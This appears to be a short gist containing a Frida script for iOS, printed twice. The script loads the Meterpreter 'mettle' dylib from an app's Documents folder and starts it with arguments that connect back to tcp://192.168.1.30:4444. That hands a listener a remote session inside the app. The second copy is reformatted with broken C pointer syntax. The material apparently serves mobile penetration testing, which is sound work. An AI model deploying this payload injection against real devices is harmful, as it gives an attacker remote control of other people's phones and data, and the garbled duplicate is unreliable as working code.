leonjza/mettle.js

## mettle.js
const dlib = 'mettle.dylib';
const NSDocumentDirectory = 9;
const NSUserDomainMask = 1
const p = ObjC.classes.NSFileManager.defaultManager()
    .URLsForDirectory_inDomains_(NSDocumentDirectory, NSUserDomainMask).lastObject().path();
const dylibPath = p + '/' + dlib;

const cm = new CModule(""+
"#include <glib.h>" +
"" +
"char **getargs() {" +
"" +
"    char **argv = g_malloc(3 * sizeof(char*));" +
"    argv[0] = \"mettle\";" +
"    argv[1] = \"-u\";" +
"    argv[2] = \"tcp://192.168.1.30:4444\";" +
"" +
"    return argv;" +
"}");

const argv = new NativeFunction(cm.getargs, 'pointer', []);

// Could have done it like as well...
//
// const argv = Memory.alloc(3 * Process.pointerSize);
// const a1 = Memory.allocUtf8String("Foo");
// const a2 = Memory.allocUtf8String("Bar");
// argv.writePointer(a1)
//     .add(Process.pointerSize).writePointer(a2);

ObjC.schedule(ObjC.mainQueue, function () {
    try {
        const libMettle = Module.load(dylibPath);
    } catch (e) {
        console.log('Known bug with loading from a full path in Frida 12.7. Ignoring...');
    }

    const mettle = Process.getModuleByName(dlib);
    const mettleMainPtr = mettle.findExportByName("main");
    const mettleMain = new NativeFunction(mettleMainPtr, 'void', ['int', 'pointer']);

    mettleMain(3, argv());
});
	const dlib = 'mettle.dylib';
	const NSDocumentDirectory = 9;
	const NSUserDomainMask = 1
	const p = ObjC.classes.NSFileManager.defaultManager()
	.URLsForDirectory_inDomains_(NSDocumentDirectory, NSUserDomainMask).lastObject().path();
	const dylibPath = p + '/' + dlib;

	const cm = new CModule(""+
	"#include <glib.h>" +
	"" +
	"char **getargs() {" +
	"" +
	" char *argv = g_malloc(3 sizeof(char*));" +
	" argv[0] = \"mettle\";" +
	" argv[1] = \"-u\";" +
	" argv[2] = \"tcp://192.168.1.30:4444\";" +
	"" +
	" return argv;" +
	"}");

	const argv = new NativeFunction(cm.getargs, 'pointer', []);

	// Could have done it like as well...
	//
	// const argv = Memory.alloc(3 * Process.pointerSize);
	// const a1 = Memory.allocUtf8String("Foo");
	// const a2 = Memory.allocUtf8String("Bar");
	// argv.writePointer(a1)
	// .add(Process.pointerSize).writePointer(a2);

	ObjC.schedule(ObjC.mainQueue, function () {
	try {
	const libMettle = Module.load(dylibPath);
	} catch (e) {
	console.log('Known bug with loading from a full path in Frida 12.7. Ignoring...');
	}

	const mettle = Process.getModuleByName(dlib);
	const mettleMainPtr = mettle.findExportByName("main");
	const mettleMain = new NativeFunction(mettleMainPtr, 'void', ['int', 'pointer']);

	mettleMain(3, argv());
	});